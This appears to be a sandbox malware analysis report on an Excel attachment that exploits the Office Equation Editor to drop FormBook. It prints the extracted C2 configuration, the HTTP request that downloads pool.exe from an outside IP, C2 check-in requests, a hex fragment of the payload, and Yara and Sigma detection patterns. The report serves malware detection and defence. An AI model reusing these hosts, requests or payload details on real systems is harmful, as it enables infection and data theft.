Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Form BA.xlsx

Overview

General Information

Sample Name:Form BA.xlsx
Analysis ID:452641
MD5:f683a8eb2e17866a194af9b23efda095
SHA1:b3002f93d24336a9af003a7a3da36217a7d7b8db
SHA256:e6de55ef568521e22566496d9df49eb1a4cf2ea94082d8d0bcd357f41d2962ef
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Execution from Suspicious Folder
Sigma detected: Suspicious Process Start Without DLL
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2384 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 3024 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1700 cmdline: 'C:\Users\Public\vbc.exe' MD5: 734A568749C7879E5CA5EA2B8E082F5E)
      • vbc.exe (PID: 1780 cmdline: C:\Users\Public\vbc.exe MD5: 734A568749C7879E5CA5EA2B8E082F5E)
        • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
        • rundll32.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • cmd.exe (PID: 1544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 3.121.113.175, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3024, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3024, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1700
      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3024, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1700
      Sigma detected: Suspicious Process Start Without DLLShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688
      Sigma detected: Suspicious Rundll32 Without Any CommandLine ParamsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Users\Public\vbc.exe, ParentImage: C:\Users\Public\vbc.exe, ParentProcessId: 1780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 1688

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.gaigoilaocai.com/wufn/"], "decoy": ["rsautoluxe.com", "theroseofsharonsalon.com", "singnema.com", "nathanielwhite108.com", "theforumonline.com", "iqpt.info", "joneshondaservice.com", "fafene.com", "solanohomebuyerclass.com", "zwq.xyz", "searchlakeconroehomes.com", "briative.com", "frystmor.city", "systemofyouth.com", "sctsmney.com", "tv-safetrading.com", "thesweetboy.com", "occulusblu.com", "pawsthemomentpetphotography.com", "travelstipsguide.com", "verifypurchase.online", "333s998.com", "amsmapped.com", "mimortgageexpert.com", "joshuatreeresearch.com", "brasilupshop.com", "support24h.site", "recipesdunnright.com", "feathertiara.net", "intoxickiss.com", "greenmommarket.com", "prinothhusky.com", "800pls.info", "martabaroagency.com", "neosinder.com", "davidwarburg.com", "chinanl168.com", "organicdiscover.com", "kingdomvets.com", "thetravellingwitch.com", "kyg-cpa.com", "bigarius.com", "collegevillepaareahomes.com", "ashestore.site", "rizqebooks.com", "techwhose.com", "peak-valleyadvertising.com", "craftbychristians.com", "laterlifelendingsupermarket.com", "setadragon.com", "pon.xyz", "reshemporium.com", "missk-hair.com", "hk6628.com", "rootmoover.com", "thetew.com", "mybodysaver.com", "cuadorcoast.com", "goteclift.com", "solisdq.info", "hsicclassactionsettlement.com", "cummingsforum.com", "talleresmulticar.com", "qq4004.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Form BA.xlsxVirustotal: Detection: 31%Perma Link
      Source: Form BA.xlsxReversingLabs: Detection: 30%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exeJoe Sandbox ML: detected
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: 6.2.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 6.2.vbc.exe.8967b0.2.unpackAvira: Label: TR/ATRAPS.Gen
      Source: 6.3.vbc.exe.8967b0.0.unpackAvira: Label: TR/ATRAPS.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: vbc.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: vbc.exe, 00000006.00000002.2243369456.0000000000896000.00000004.00000020.sdmp
      Source: global trafficDNS query: name: www.pon.xyz
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 3.121.113.175:80
      Source: excel.exeMemory has grown: Private usage: 4MB later: 69MB

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 151.101.0.119:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.gaigoilaocai.com/wufn/
      Performs DNS queries to domains with low reputationShow sources
      Source: C:\Windows\explorer.exeDNS query: www.pon.xyz
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 15:14:54 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Thu, 22 Jul 2021 05:09:55 GMTETag: "ae200-5c7af4c3e3d9d"Accept-Ranges: bytesContent-Length: 713216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc df f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d8 0a 00 00 08 00 00 00 00 00 00 ce f6 0a 00 00 20 00 00 00 00 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f6 0a 00 4f 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec d6 0a 00 00 20 00 00 00 d8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0b 00 00 06 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc e1 00 00 70 eb 00 00 03 00 00 00 01 00 00 06 4c cd 01 00 30 29 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 45 02 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a
      Source: global trafficHTTP traffic detected: GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1Host: www.pon.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1Host: www.intoxickiss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
      Source: global trafficHTTP traffic detected: GET /www/pool.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.121.113.175Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: unknownTCP traffic detected without corresponding DNS query: 3.121.113.175
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emfJump to behavior
      Source: global trafficHTTP traffic detected: GET /www/pool.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.121.113.175Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wufn/?6lPhQ=TjHmMFER1Cmk2H/fB4fy73K0u4EyZw5fKqkeqDjs9aj0G9oQA4BDCdhs/b9tHPs2qA0f+w==&yN94=f2JPQ0jxKXodUnz HTTP/1.1Host: www.pon.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /wufn/?yN94=f2JPQ0jxKXodUnz&6lPhQ=eFcjLRgZ/IJICcXgyTb3Jzj/ojOR5Bd5C6w81D5RMgQILdL/YJI1IJ8dE7ncgUBzQfOvsg== HTTP/1.1Host: www.intoxickiss.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
      Source: explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknownDNS traffic detected: queries for: www.pon.xyz
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
      Source: vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpString found in binary or memory: http://api.twitter.com/1/direct_messages.xml?since_id=
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
      Source: explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
